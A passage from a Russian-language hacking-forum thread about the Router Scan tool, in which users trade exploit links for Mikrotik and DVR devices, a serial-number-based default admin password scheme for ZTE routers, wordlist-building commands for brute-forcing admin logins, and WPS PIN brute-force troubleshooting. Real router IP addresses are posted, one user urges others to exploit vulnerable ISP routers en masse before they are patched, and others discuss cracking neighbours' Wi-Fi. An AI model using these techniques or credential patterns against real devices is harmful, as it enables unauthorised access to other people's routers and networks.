Просмотр полной версии : прога Router Scan
Неа. Последняя обнова гоняется. Не тащит.
https://ibb.co/NrVzvSX
tyrboloto
25.01.2020, 19:29
сделайте на ф680 эксплоит https://i.imgur.com/U1ncoRN.png
сделайте на ф680 эксплоит https://i.imgur.com/U1ncoRN.png
Полагаю в конце просьбы Вы забыли добавить линк на сам нужный эксплоит..
Еще не поздно
tyrboloto
25.01.2020, 20:40
Полагаю в конце просьбы Вы забыли добавить линк на сам нужный эксплоит..
Еще не поздно
о да .
binarymaster
25.01.2020, 23:50
ZTE ZXHN H298 не получает MAC если нет захода в админку. Для superadmin подходит пароль Zte531zTE@fnХХХХХ, где ХХХХХ это последние 5 цифр серийного номера, если получится вытаскивать серийник то можно получить пароль в админку.
Удалось найти способ получения MAC и Serial, снова помог пользователь RES из чата.
Так вроде bynarymaster добавил этот эксплоит ) в чате была тема про это )
Да, но там пароль немного другой был - Zte521zTE@ponXXXXX.
Некоторые TP-LINK Archer C5 Router не читаются. На которых работает вход по стандартному видно различие.
Версия встроенного ПО:3.16.0 0.9.1 v6020.0 Build 190103 Rel.51938n читаются
Версия встроенного ПО:3.16.0 0.9.1 v6020.0 Build 191017 Rel.38520n не читаются.
Например http://109.195.114.191:8080/ пасс стандартный не читается.
Исправил.
Возможно использование некоторых "новых" экплоитов для Mikrotik?
Например
https://github.com/miladdiaz/MikrotikExploit
https://github.com/BigNerd95/WinboxExploit
https://github.com/tenable/routeros/tree/master/poc/bytheway
https://www.securitylab.ru/vulnerability/499702.php
По-моему из всех этих, которые возможно реализовать в RS, уже все есть. Попрошу @jabberd (https://forum.antichat.xyz/members/123116/) посмотреть, как эксперта по микротикам.
Роутерскан по микротам давно уже (у меня) ничего не находит, при том что сами отдельные эксплоиты - все исследуют
Какие отдельные эксплойты? Какие IP адреса и какие версии прошивок? Где конкретика?
там же можно и хэш вытащить (скореевсего он - Cisco-PIX MD5 - Hashcat Mode 2400) пароля от админки выташить во вкладке администрирование
d6nw5v1x2pc7st9m
По-моему это не пароль и не его хеш, это паролезаменитель (такой же на DD-WRT используется, и во многих других прошивках).
Еще куча Zyxel попадаются типа ZyWALL 110 и Zyxel USG всякие сюда бы еще если можно... https://www.exploit-db.com/exploits/46706
Если найдёте IP адреса устройств, на которых удаётся воспроизвести эксплуатацию, напишите.
По-моему это не пароль и не его хеш, это паролезаменитель (такой же на DD-WRT используется, и во многих других прошивках).
да верно, хэш расшифровывается админ, но не подходит)))) прошу прощения за введение в заблуждение.
По-моему из всех этих, которые возможно реализовать в RS, уже все есть. Попрошу @jabberd (https://forum.antichat.xyz/members/123116/) посмотреть, как эксперта по микротикам.
Первые два и есть тот самый эксплоит, который в Router Scan реализован в апреле 2018, когда ещё их никто публично не выкладывал. "By the way" — это получение рут-доступа к микротику при известных учётных данных админа, причём происходит модификация системы. Последняя ссылка — непонятно что, конкретных публичных эксплоитов я не нашёл.
Из примерно почти 400 Mikrotik ни один не сдался....
Хотя на github до версии 6.43 вроде. А тут ничего интересного нет?
https://www.cvedetails.com/vulnerab...&sha=54982f4894183538bda0bf316e8a38e16187ea4f
И вот это совсем не подойдет? Вроде прошлогоднее.... https://www.exploit-db.com/exploits/47566
Из примерно почти 400 Mikrotik ни один не сдался....
Хотя на github до версии 6.43 вроде. А тут ничего интересного нет?
https://www.cvedetails.com/vulnerab...&sha=54982f4894183538bda0bf316e8a38e161 87ea4f
И вот это совсем не подойдет? Вроде прошлогоднее.... https://www.exploit-db.com/exploits/47566
Раз уж Вы написали, не могу не прокомментировать..
Роутерскан,У МЕНЯ, с какого-то незапамятного обновления также перестал открывать микроты
Помню, когда он работал это было как нечто сказочное: буквально открывания шли десятками подряд.
Сейчас я роутерскан использую как удобную программу для получения списка ip с открытым портом winbox (8291)
А потом скармливаю текстовый файл таких ip классическому эксплоиту на питоне, упоминавшемуся выше на несколько сообщений.
И открытия - начинают ползти как и пару лет назад.
binarymaster
26.01.2020, 03:52
И вот это совсем не подойдет? Вроде прошлогоднее.... https://www.exploit-db.com/exploits/47566
DNS Cache Poisoning... ну вы хотя бы заголовок читайте, перед тем как скидывать. И думайте своей головой, возможно ли такое реализовать в Router Scan, или нет.
Напомню о том, какие требования к эксплойтам в RS:
1. Эксплойт применим к веб интерфейсу роутера (протокол HTTP)
2. Его можно применить здесь и сейчас (это не отложенная атака)
3. Эксплойт не модифицирует настройки устройства, не закрывает доступ к нему, и не вызывает отказ в обслуживании
Сейчас я роутерскан использую как удобную программу для получения списка ip с открытым портом winbox (8291)
А потом скармливаю текстовый файл таких ip классическому эксплоиту на питоне, упоминавшемуся выше на несколько сообщений.
Для Router Scan необходимо, чтобы веб морда роутера была доступна.
Из примерно почти 400 Mikrotik ни один не сдался....
Хотя на github до версии 6.43 вроде.
Если порт Winbox недоступен, эксплойт отработать не сможет.
Помню, когда он работал это было как нечто сказочное: буквально открывания шли десятками подряд.
Я вроде уже как-то упоминал здесь в теме, что по сетям бегают Робин Гуды, которые закрывают уязвимые устройства.
\
Для Router Scan необходимо, чтобы веб морда роутера была доступна.
Если порт Winbox недоступен, эксплойт отработать не сможет.
Я вроде уже как-то упоминал здесь в теме, что по сетям бегают Робин Гуды, которые закрывают уязвимые устройства.
Вы уже упоминали об этом всем, и тем не менее, даже с открытым портом web доступа микроты у роутерскана стали редкими гостями.
Уверен что не все абсолютно, но большинство
Из примерно почти 400 Mikrotik ни один не сдался....
Хотя на github до версии 6.43 вроде. А тут ничего интересного нет?
https://www.cvedetails.com/vulnerab...&sha=54982f4894183538bda0bf316e8a38e161 87ea4f
И вот это совсем не подойдет? Вроде прошлогоднее.... https://www.exploit-db.com/exploits/47566
В основном баги, которыми можно вызвать DoS. К тем, что вызывают RCE, публичные эксплоиты не встречались мне. Да и всё слишком специфично, в основном, это не HTTP-протокол.
Что касается бага с отравлением кеша DNS — это совсем не годится: при очень специфических условиях это может привести к установке прошивки злоумышленника. Это должна быть целенаправленная атака, включающая также наличие контролируемого DNS-сервера злоумышленника. Администратор устройства должен разрешить обновление вручную (увидеть, что появилась "новая" прошивка и нажать Install), либо каким-то механизмом должны автоматически устанавливаться новые прошивки, что на практике бывает очень редко.
Это все понятно. Не волшебники же. В том эксплойте упоминилась версия до 6.36 типа в 6.38 уже исправили. Где то вы сами говорили что после 6.36 тот эксплоит не работает. Там обновления пошли с 6.38. Тут вроде заявлено до 6.43. По скану порты 8291 открыты прошивки старые. Может что-то сбилось...
А это тоже ни -как? https://exploit.kitploit.com/2018/08/mikrotik-winbox-642-credential.html
Ее даже в cve не регистрировали...
ну вы хотя бы заголовок читайте, перед тем как скидывать. И думайте своей головой, возможно ли такое реализовать в Router Scan, или нет.
Я не программист. Обычный сервисник. Еще тогда заметил что после какой-то обновы все тоже самое прекратилось. запускаешь старое работает. новое нет. Тогда забил не до этого было. Но такое есть, пытался найти архивы но на больше чем 10 винтах пока найдешь... Это не претензии. Тыт их быть в принципе не может. Все сообща кто что узнает ошибки баги... как что... Тестирум по мере возможности....
binarymaster
26.01.2020, 20:46
Еще тогда заметил что после какой-то обновы все тоже самое прекратилось. запускаешь старое работает. новое нет.
Когда на старой сборке работает, а на новой нет, это называется регрессией. Пожалуйста сообщайте о таких случаях, прилагая IP адреса и отчёты сканирования от старой и новой сборки.
Я не программист. Обычный сервисник.
Для понимания именно этих вещей не обязательно быть программистом.
Вы уже упоминали об этом всем, и тем не менее, даже с открытым портом web доступа микроты у роутерскана стали редкими гостями.
Я проверил список IP адресов, которые вы мне скинули в личке, и вот результаты в виде статистики:
- 46 адресов всего проверено (пропустил дубликаты и внутренние адреса)
- 3 устройства RS обработал успешно, одно из которых было на нестандартном HTTP порте 888
- 9 устройств не дают войти в веб интерфейс, не смотря на то, что эксплойт получил данные аккаунтов
- 31 устройство с выключенным веб интерфейсом
- 3 устройства были оффлайн на момент проверки
Собственно, что и требовалось доказать, проблема не в Router Scan. Более подробные результаты выслал в личку.
Неа. Последняя обнова гоняется. Не тащит. А так эта дырка в
Linksys EA2700, EA3500, E4200, EA4500
У меня тоже данные не вытаскивает. Определяет модель роутера и сразу брутит на логин-пароль, не применяет перед брутом эксплоит. Если в программу добавить порт 8083, то данные вытаскивает. Только уже работа роутер скана увеличивается, у каждого устройства проверять порт 8083 и напрасно брутить уязвимые модели на 80 и 443 портах.
Monohrom
26.01.2020, 23:46
Нашёл в телеграме пару скриптов сделаных для Router Scan, может кому нужны будут
"Короче соорудил скрипт для подбора пина. Как пользоваться? Запускаете на Python 3 версии, вводите название файла куда сохран ять пинв и выбираете "First half". После чего брутите, пока не будет найдена первая пара. После того как она найдена, пользуйтесь этим скриптом: запускаете, выбираете "Second half" и вводите первые четыре цифры которые подобрались. Скрипт вам составит еще один список с пинкодами, который потом опять в Router scan. За идею спасибо exZet ."
2) "Может кому пригодится. Скрипт для склеивания отчетов CSV роутер скана"
Я проверил список IP адресов, которые вы мне скинули в личке, и вот результаты в виде статистики:
- 46 адресов всего проверено (пропустил дубликаты и внутренние адреса)
- 3 устройства RS обработал успешно, одно из которых было на нестандартном HTTP порте 888
- 9 устройств не дают войти в веб интерфейс, не смотря на то, что эксплойт получил данные аккаунтов
- 31 устройство с выключенным веб интерфейсом
- 3 устройства были оффлайн на момент проверки
Собственно, что и требовалось доказать, проблема не в Router Scan. Более подробные результаты выслал в личку.
Что я могу ответить?
Жаль что это не помогло расшевеливанию эксплоита в роутерскане.... )
binarymaster
27.01.2020, 00:43
Жаль что это не помогло расшевеливанию эксплоита в роутерскане.... )
https://media.giphy.com/media/dvWvnRdc4h440/giphy.gif
У меня тоже данные не вытаскивает. Определяет модель роутера и сразу брутит на логин-пароль, не применяет перед брутом эксплоит. Если в программу добавить порт 8083, то данные вытаскивает. Только уже работа роутер скана увеличивается, у каждого устройства проверять порт 8083 и напрасно брутить уязвимые модели на 80 и 443 портах.
ну так как бы и подразумевается что с них информацию и можно вытащить только по 8083 порту....
Тут вроде заявлено до 6.43. По скану порты 8291 открыты прошивки старые. Может что-то сбилось...
А это тоже ни -как? https://exploit.kitploit.com/2018/08/mikrotik-winbox-642-credential.html
Ее даже в cve не регистрировали...
По данной ссылке тот же самый эксплоит, реализованный в RS. Затронутые версии: 6.29—6.42. Пофиксили в 6.42.1, а не в 6.43.
Это CVE-2018-14847.
Или можно логин оставить постоянный и как-то подключить словарь?
Оставить логин и перебирать пароль не получится. Нужно создать словарь с парами пароль-логин в нужном формате (как исходные словари).
И так будет работать если устройство подходит для работы со словарями. Если перебираются пароли при стандартном сканировании.
Оставить логин и перебирать пароль не получится. Нужно создать словарь с парами пароль-логин в нужном формате (как исходные словари).
И так будет работать если устройство подходит для работы со словарями. Если перебираются пароли при стандартном сканировании.
А какое поле (в настройках) указывать путь к такому словарю?
Basic, Digist или Form?
Я попробовал тестовый словарь в каждое поле и на всех удается найти пароль.
Но вопрос остается в какое лучше? Так как мне надо перебрать 100 000 паролей, и есть ограничение через web-форму 3 неудачных попытки и 60 сек. тайм-аут. Причем, 3 попытки можно сделать и в течение 5 минут и все-равно будет 60 сек.
P.S.: Как создать словарь чтобы сначала шел логин, потом табуляция и потом пароль?
crunch 17 17 -t Zte531zTE@fn%%%%% -l aaaaaaaaa@aaaaaaa -o pass.txt
создает только логины.
Как-то странно работает Router Scan!
После того как он успешно нашел пароль от админки (в словаре из паролей), я подсунул потом файл без правильного пароля и он все-равно находит правильный пароль.
Как такое может быть?
Сделай словарь с любым разделителем. Потом, в notepad++ замени на таб.
Или ищи другую программу.
Как там табуляцию поставить? При нажатии табуляции начинает выделенная область перемещаться.
Вот так сделал.
sed -e 's/^/superadmin\t/' pass.txt > login_pass.txt
Как там табуляцию поставить? При нажатии табуляции начинает выделенная область перемещаться.
\t
С табуляцией разобрался, спасибо. Как теперь запускать "Роутер Скан" для тестирования?
1. Теперь прога определяет логин и пароль даже если удалю папку с программой, затем разархивирую и запущу со словарями, которые идут по умолчанию. Там точно нет ни моего логина ни моего пароля, но она выдает пароль и логин.
2. Сколько потоков надо выбирать? Так как программа завершает работу через 3 минуты. Пишет done.
3. И по формам тоже можете подсказать? Я пока во все три подставляю.
Вот такие настройки.
На втором скриншоте внизу аквтивные потоки всегда по нолям.
Так и должно быть?
- попробуй это https://forum.antichat.ru/threads/436408/page-5#post-4041408
я подсунул потом файл без правильного пароля и он все-равно находит правильный пароль.<br/>
Как такое может быть?
значит на этот роутер есть эксплоит и он успешно отрабатывает
tyrboloto
28.01.2020, 17:56
чо за херь https://i.imgur.com/nP7fIIn.png
значит на этот роутер есть эксплоит и он успешно отрабатывает
Нет. На другом аналогичном роутере так пароль не подбирает пароль.
Да и раньше, когда я запускал со словарями по умочанию никогда на этом роутере пароль не подбирал. Только сегодня я создал словарь на 20 паролей и только тогда он подобрал.
Как мне его обнулить чтобы проводит эксперемент?
Я изменил пароль.
Если пароль стоит 1-ым, то при настройках по умолчанию "Роутер Скан" его находит и запоминает, а если пароль по счету на 20-м месте, то нет.
Какие нужны настройки?
binarymaster
29.01.2020, 18:53
Не определяет
http://91.243.36.36/
http://91.243.36.69/
определяет как Web server хотя это Keenetic Start
Добавил в поддержку последнюю версию NDMS v3, если у кого не парсилось.
чо за херь
А это известный баг, уже много раз обсуждали здесь.
irina001
30.01.2020, 00:44
В прошлой версии, при сканировании админки, 100% , надпись Done и никаких данных, в последней версии скана сразу блок, отсчет минута, блок минута и по кругу, что это?
блок минута и по кругу, что это?
Видимо, роутер блокирует перебор пароля администратора, давая пользователю время "на подумать" перед очередной попыткой. Прошлая версия роутерскана этого не понимала, и перебор шел в пустую. В свежей версии это исправили.
Поскольку конкретики в вопросе нет, в ответе только догадки.
Видимо, роутер блокирует перебор пароля администратора, давая пользователю время "на подумать" перед очередной попыткой. Прошлая версия роутерскана этого не понимала, и перебор шел в пустую. В свежей версии это исправили.
Поскольку конкретики в вопросе нет, в ответе только догадки.
А в какой версии был перебор без остановки? И где ее скачать?
binarymaster
30.01.2020, 16:37
А в какой версии был перебор без остановки? И где ее скачать?
Включи голову. Роутер тебя не впустит, если ты его будешь перебирать без остановки.
есть ли такой эксплоит в RS для DVR - довольно простой и нтересный)))
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
если нету, то было бы не плохо добавить....
https://www.exploit-db.com/exploits/38470 еще один, у меня с паролем и логином quest впринципе RS вытащил информацию, но в хелпе не нашел информацию по этому эксплоиту... хоть и нет особого в нем смысла т.к. учетка с правами суперадмина есть в логин\пасс листе...
брутил пины (полный перебор), остановился, потом хотел продолжить с того же места, прописал в Audit.WPS.PinOrder значение последнего пина, запустил и обнаружил что перебор идёт в обе стороны
Trying pin "05630004"...
Trying pin "05640003"...
Trying pin "05620005"...
Trying pin "05650002"...
Trying pin "05610006"...
такое поведение можно как то изменить? что бы только "вверх"
binarymaster
31.01.2020, 20:11
брутил пины (полный перебор), остановился, потом хотел продолжить с того же места, прописал в Audit.WPS.PinOrder значение последнего пина, запустил и обнаружил что перебор идёт в обе стороны. такое поведение можно как то изменить? что бы только "вверх"
Эта опция указывает лишь начальный пин, от которого идёт отсчёт в обе стороны.
В планах реализация сохранения сессии перебора, чтобы продолжать с места остановки. Вероятно также будет возможность указать позицию в списке вручную. Но пока это не реализовано.
Но пока это не реализовано.
Сейчас как то можно выйти из ситуации? Думал просто добавить список пинов с полным диапазоном и поснимать все галки в настройках, но программа перебирает не так как с отключенный опцией "Check pins in the list", а долго мучает один и тот же пин..
брутил пины (полный перебор), остановился, потом хотел продолжить с того же места, прописал в Audit.WPS.PinOrder значение последнего пина, запустил и обнаружил что перебор идёт в обе стороны
Trying pin "05630004"...
Trying pin "05640003"...
Trying pin "05620005"...
Trying pin "05650002"...
Trying pin "05610006"...
такое поведение можно как то изменить? что бы только "вверх"
waircut заюзай, там опция запомнить последний пин и с него начать
binarymaster
31.01.2020, 20:57
Сейчас как то можно выйти из ситуации? Думал просто добавить список пинов с полным диапазоном и поснимать все галки в настройках, но программа перебирает не так как с отключенный опцией "Check pins in the list", а долго мучает один и тот же пин..
Прикрепите логи, чтобы понять причину, почему подбирается только один пин.
там же явно написано это
Этот AP потенциально уязвим для вывода «пустая строка».
Чтобы указать пин-код, добавьте пустую строку в список ПИН-кодов и отключите вычисление контрольной суммы.
Также в этом случае штифт может иметь две одинаковые половины (например, 00000000).
пробовал с пустым пином?
пробовал с пустым пином?
пробовал, не находит
binarymaster
01.02.2020, 02:51
https://forum.antichat.ru/attachments/8903/
У вас пины оканчиваются на разные числа, хотя по правилам последняя цифра WPS PIN - контрольная сумма. RS автоматически исправляет контрольную сумму, поэтому по факту перебирает один и тот же пин несколько раз.
Вам нужно либо очистить список пинов от лишних с неправильной контрольной суммой, либо отключить коррекцию контрольной суммы "Don't calculate checksums".
dart8888
01.02.2020, 10:21
в чём прикол..?
и прога закрывается потом.. ((
https://sun9-66.userapi.com/c857020/v857020229/ceb15/8n6DALwaepA.jpg
создателю респект огромный)
в чём прикол..?
и прога закрывается потом.. ((
ну матерится на дллку винпкапа, попробуй переустановить.... , лучше ставь npcap и отметь чекбокс для совместимости с wnpcap(ом) не поможет, переустани\обнови дрова на вафлю, потом sfc/scannow и так далее.. ни что не поможет - переустанавливай винду...
ну и смотри еще что пишет в журнале ошибок.
dart8888
02.02.2020, 21:34
ну матерится на дллку винпкапа, попробуй переустановить.... , лучше ставь npcap и отметь чекбокс для совместимости с wnpcap(ом) не поможет, переустани\обнови дрова на вафлю, потом sfc/scannow и так далее.. ни что не поможет - переустанавливай винду...
ну и смотри еще что пишет в журнале ошибок.
спасибо - ))),
На семёрке на втором ноутбуке всё летает просто). как орехи.. ))
Но вот на новой сенсорном трансформере Леново с десяткой, подзависает так, что даже скрин не фиксирует, пришлось с телефона сфотать.
Хотелось бы уточнить у мастера - wind10 полностью не поддерживается?
заранее Извиняюсь - за глупый вопрос.
wind10 полностью не поддерживается?
поддерживается, у самого десятка, а что пишет то хоть в журнале ошибок в винде?
dart8888
03.02.2020, 12:37
снёс драйвер вафли - переустановил, вылет проги пропал. Вот на этой всё стоит щас, Почему то дальше второго пакета не простреливает(( и что интересно один и тот же пин по кругу гоняет, что я только не делал - все комбинации по несколько раз прокручивал - не помогает, Список ПИНов вкидываешь, он на первом стопорится - и всю ночь гоняет его.. Странно
Почему то дальше второго пакета не простреливает((
какя модель роутера? Бывает на некоторых такое, пробуй другую точку или если принципеально нужна эта, то лови хендшэйк и бруть пароль
dart8888
03.02.2020, 17:16
какя модель роутера? Бывает на некоторых такое, пробуй другую точку или если принципеально нужна эта, то лови хендшэйк и бруть пароль
Channel: 11 (2.4 GHz)
BSSID: D0:54:2D:97:B5:A8
ESSID: "******"
Security type: WPA/WPA2
Signal Level: -89 dBm
WPS: version 1.0, configured
( 1.0 Yes )
WSC Name: CIG GPON ONT RG
Device Model: CIG GPON ONT RG CIG00000001
Serial Number: 12345678
и что интересно - На втором ноуте тоже бесконечный перебор идёт.
3Вайфай - предлогает пин с точностью 96%
Гм.. но по факту такая вот неудача с ним. ((
"транзакция не проходит до конца, поэтому RS не может принять решение, пин верный или нет, и соответственно перейти к следующему."
какя модель роутера? Бывает на некоторых такое, пробуй другую точку или если принципеально нужна эта, то лови хендшэйк и бруть пароль
Ого)) ХШ ловить.. мозгов бы хватило)) - чем посоветуешь? ))
заранее благодарю)
Signal Level: -89 dBm
С таким уровнем сигнала, вряд ли что поймаешь.
binarymaster
03.02.2020, 17:30
С таким уровнем сигнала, вряд ли что поймаешь.
Уровень сигнала - не всегда приговор.
https://forum.antichat.ru/attachments/8908/
Отключи Small DH Keys, может поможет (а может и нет).
гпоны не пробиваемые, кучу перепробовал, даже можеш не пробовать, как вариант попробуй подбор ключа\пароля (только так получалось), при том что тоже странные роутеры (в них оптика приходит), ни прошивок в общем доступе, ни уязвимостей опубликованных не попадалось, хоть их последнее время и стали массово некоторые провайдеры ставить ("оптика в дом" или как там услуга называется)....
binarymaster
03.02.2020, 23:50
есть ли такой эксплоит в RS для DVR - довольно простой и нтересный)))
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
если нету, то было бы не плохо добавить....
Сейчас пришлось потратить время впустую на исследование того, что уже есть...
Это так сложно, открыть документацию, и проверить есть ли в ней этот эксплойт. А главное, ссылка на эксплойт в документации та же самая.
tyrboloto
04.02.2020, 00:23
гпоны не пробиваемые, кучу перепробовал, даже можеш не пробовать, как вариант попробуй подбор ключа\пароля (только так получалось), при том что тоже странные роутеры (в них оптика приходит), ни прошивок в общем доступе, ни уязвимостей опубликованных не попадалось, хоть их последнее время и стали массово некоторые провайдеры ставить ("оптика в дом" или как там услуга называется)....
ну почему zte f670 гпон ищется ( но не все хз почему ) вот zte f680 не пробиваемые , но я надеюсь пока
dart8888
04.02.2020, 16:02
ребят, заметил такой недостаток - ресолве сторед кейс не вспоминает все "бруты". а лишь последний, а когда и вообще ничего не всплывает. Благо при обнаруженни вручную сразу копирую в отдельный текст.файл. Но вот почему эта хорошая функция не вспоминает известные и ей же обнаруженные - остаётся загадкой.
И ещё вопрос: при установке программы - у меня на ноуте образуется новая вирт.сеть причём с моим названием компа, так должно быть? или это что то у меня... ?
binarymaster
04.02.2020, 17:23
ресолве сторед кейс не вспоминает все "бруты". почему эта хорошая функция не вспоминает известные и ей же обнаруженные - остаётся загадкой.
А оно и не должно. Эта функция для отображения ключей тех сетей, которые сохранены в системе.
Благо при обнаруженни вручную сразу копирую в отдельный текст.файл.
Без паники, все добытые сети во вкладке Wireless сохраняются в файл good.txt автоматически по умолчанию.
при установке программы - у меня на ноуте образуется новая вирт.сеть причём с моим названием компа, так должно быть? или это что то у меня... ?
Без скриншота не очень понятна суть вопроса.
dart8888
04.02.2020, 18:03
Без скриншота не очень понятна суть вопроса.[/QUOTE]
https://sun9-20.userapi.com/c854024/v854024984/1e761d/CQlQ3HVmYJE.jpg
новый виртуальный адаптер - удаляешь его он снова появляется
с телефона и другого ноута в списке сетей её постоянно видно
заранее извинияюсь - за свою невежественность
binarymaster
04.02.2020, 19:02
новый виртуальный адаптер - удаляешь его он снова появляется
https://forum.antichat.ru/attachments/8914/
Это Wi-Fi Direct, стандартная вещь, его создаёт драйвер адаптера. Router Scan тут не при чём.
с телефона и другого ноута в списке сетей её постоянно видно
Если нужно отключить - гуглите как отключить Wi-Fi Direct на Windows 10.
dart8888
04.02.2020, 19:38
Это Wi-Fi Direct, стандартная вещь, его создаёт драйвер адаптера. Router Scan тут не при чём.
Если нужно отключить - гуглите как отключить Wi-Fi Direct на Windows 10.
Спасибо) . Точно это "проецирование на этот комп" .. отключил))
binarymaster
05.02.2020, 16:37
Подскажите, почему точка может слать M1 в ответ на M2? Должна же слать M3 по идее?
Похоже, точка тебя плохо слышит.
И почему RS не шлёт в M2 R-Nonce?
Всё он шлёт, просто в логе не выводит за ненадобностью.
dart8888
05.02.2020, 22:34
вот на ноутбуке было бы весьма удобно - добавить пару примочек в РоутерСкан) Например - в роли менеджера сетей, что бы можно было задать порог сигнала на подключение к сети, и автоматом подключался к ближайшим точкам, а при уменьшении сигнала согласно заданому низкому порогу, при присутствии известных и более мощных переключалось бы к ним. Подобно спайдермену летящего в городе на паутине), Цель: - чтобы ноутбук был предельно возможно подключенному к интернету. Извиняюсь за оффтоп но Есть похожие проги с такими возможностями? Чтоб сливать туда инфу с РС и не париться за рулём. И..кстати.. автоопределение внеш.диапазонов айпишников провайдера в подключенной сети для сканера непомешало бы..
Piligrim740
05.02.2020, 22:54
Подобно спайдермену летящего в городе на паутине), Цель: - чтобы ноутбук был предельно возможно подключенному к интернету. Извиняюсь за оффтоп но Есть похожие проги с такими возможностями?
А ещё добавить кнопку - взломать всех !
Более полной базы, как на 3WiFi, не встречал.
Да и вряд-ли будет, потому как здесь, целый коллектив вносит посильный вклад в базу.
Так что, не ленимся, сканим - ломаем, по возможности хлопаем по WPS, добавляем в базу.
Piligrim740
06.02.2020, 00:15
Парни, я в шоке !!!
Роутеры "Npk Rotek" у DOM.RU , лупятся сборкой Router Scan от 04.02.2020 , по 80 порту !!!!
Успевайте, долбите по максимуму, пока дыру не закрыли !!!
Воа расшифровывает в Rotek )))))))))))))))))
https://c.radikal.ru/c42/2002/6d/d2b7575a6dca.jpg
https://c.radikal.ru/c01/2002/31/9c2fca5ee048.jpg
Та-же ситуация в Ульяновске !!!
Похоже много где работает... кааайф.
dart8888
06.02.2020, 01:37
а гууд.ткст тоже потом можно слить в 3файфай? Или как настроешь? Автоматически?
binarymaster
06.02.2020, 02:31
а гууд.ткст тоже потом можно слить в 3файфай? Или как настроешь? Автоматически?
3WiFi может принимать только отчёты сканирования IP адресов роутеров.
dart8888
06.02.2020, 04:47
странно что винда не запоминает подключения.. и при выходе не видит найденные просит снова вводить пароль к сети.. ((
dart8888
06.02.2020, 11:39
Если поставил 10-ку, тогда тебе нужно покапаться в реестре
http://www.soft-besplatno.ru/windows/avtomaticheskoe-podkluchenie-k-internetu
хспди, да причём тут впн и вообще шнурок.. Я говорю про вайфай на ноутбуке, вин10 на борту, В проге РС жмёшь конект к сети или же галку ставишь на автоподключение после успешного "сканирования" подключение происходит, НО внесения в системную директорию "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfac es" Вытащенного пароля не происходит. Странно, хотя кнопка коннект в РС, на сколько я понял, должна отрабатывать скрипт ручного введения ключа в соответств.поле пароля?
Piligrim740
06.02.2020, 11:49
хспди, да причём тут впн и вообще шнурок..
Ты не чуди, какой VPN, какой шнурок ?
Читай внимательно !!!
Рассмотрим способ автоматического подключения к интернету в Windows 10, 8 или 7 без использования каких-либо дополнительных программ, исключительно используя возможности самой операционной системы.
Итак, будем использовать команду Windows: rasdial
2.1. Создадим bat-файл следующего содержания:
rasdial ""
где обязательно используйте только английские буквы, пробелы можно. Русские буквы через bat-файл работать не будут, однако, если вы выполните данную команду просто в адресной строке любого окна стандартной программы "Проводник", тогда там можно использовать русские буквы.
Например:
rasdial "Dom.ru" MyLogin pass1234
2.2. Помещаем данный файл (или ярлык на него) в папку "Автозагрузка" текущего пользователя
Все, теперь при старте Windows автоматически сработает данный bat-файл и подключение будет выполнено. Также в папку "Автозагрузка" вы можете поместить ярлык вашего интернет браузера, например, Google Chrome или прочий.
А вообще, это тема по Router Scan.
Удали весь паражняк в теме, и напиши в теме - Задай вопрос - получи ответ
https://forum.antichat.ru/threads/424494/page-291
dart8888
06.02.2020, 13:09
Ты не чуди, какой VPN, какой шнурок ?
Читай внимательно !!!
Может тебе надо внимательнее читать?
Рассмотрим способ автоматического подключения к интернету в Windows 10, 8 или 7 без использования каких-либо дополнительных программ, исключительно используя возможности самой операционной системы.<br/>
Итак, будем использовать команду Windows: rasdial<br/>
2.1. Создадим bat-файл следующего содержания:
rasdial "<Имя подключения>" <Логин> <Пароль>
где <Имя подключения> обязательно используйте только английские буквы, пробелы можно. Русские буквы через bat-файл работать не будут, однако, если вы выполните данную команду просто в адресной строке любого окна стандартной программы "Проводник", тогда там можно использовать русские буквы.<br/>
Например:<br/>
rasdial "Dom.ru" MyLogin pass1234<br/>
2.2. Помещаем данный файл (или ярлык на него) в папку "Автозагрузка" текущего пользователя<br/>
Все, теперь при старте Windows автоматически сработает данный bat-файл и подключение будет выполнено. Также в папку "Автозагрузка" вы можете поместить ярлык вашего интернет браузера, например, Google Chrome или прочий.
А вообще, это тема по Router Scan.<br/>
Удали весь паражняк в теме, и напиши в теме - Задай вопрос - получи ответ
https://forum.antichat.ru/threads/424494/page-291
Эй? хватит тупить - я говорю РС не сохраняет пароли от найденных взломанных роутеров - в системе Виндовс!! Хотя кнопка подключится есть! Но пароль не сохраняется! Вот я о чём!! Подключение есть - пароля нет! Но пароль виден в РС. Как так то??
binarymaster
06.02.2020, 13:50
Эй? хватит тупить - я говорю РС не сохраняет пароли от найденных взломанных роутеров - в системе Виндовс!!
Хватит тупить - правая кнопка мыши на добытой сети, Store network profile.
dart8888
06.02.2020, 14:11
Хватит тупить - правая кнопка мыши на добытой сети, Store network profile.
Спасибо)) точно>!! заработало))
0) другой драйвер на wifi карту (например, более старый);
1) другой wifi адаптер;
2) другую версию RS (скачать пре-релиз);
3) другую версию npcap (более старую), или вообще удалить npcap и установить старый winpcap 4.1.3
Кстати, под линуксами подключение по wps проходит нормально ?
Пробовал из под двух разных адаптеров (один USB noname, который умеет инжектировать) из под 7 венды на два разных роутера. До М3 доходит только на мой роутер с WPS 1.0 и только с внешним USB адаптером. И толку нет все равно, т. к. даже с правильным пином RS меня самого не вскрывает и пишет неизвестную ошибку 0000. RS разных версий тоже пробовал. Про npcap и winpcap вообще не понял при чём они, т. к. RS вроде работает сам по себе. В кали ривер пишет, что не может ассоциирроваться.
Хендшейки даже в платном подборе не вскрываются.
Руки опускаются и, видимо, о боже, придётся платить за интернет (чего я не делал последние n лет), по немецким ценам, баснословные деньги - 70 ойро за подключение и 35 ойро в месяц
Нет, с wps сам по себе RS не работает, npcap или winpcap нужны.
Если бы у меня его не было, полагаю, дело не дошло бы даже до М1-М2?
Если бы у меня его не было, полагаю, дело не дошло бы даже до М1-М2?
зная пин, попробуй тогда подключиться через JumpStart, waircut, Dumpper (проги waircut и Dumpper используют JumpStart) или WPS Connect для Android
лови хендшек с него и вперед.
Хендшейки на соседские роутеры давно пойманы и выложены в платный перебор. Вскрыть, насколько понимаю, их не смогли.
и откуда увереность что пин верный?
На своём роутере пробовал, пин в вебморде посмотрел
Короч, заработало с Npcap и с последним RS - запускается Pixie Dust, но вскрыть его не может, т. к. TP-LINKи не ломаются через WPS насколько я помню. Если внести правильный пин в список - то вскрывается сразу. Но на моём роутере WPS 1.0
А соседские роутеры не шлют М3 всё равно. Возможно потому, что у них у всех WPS 2.0
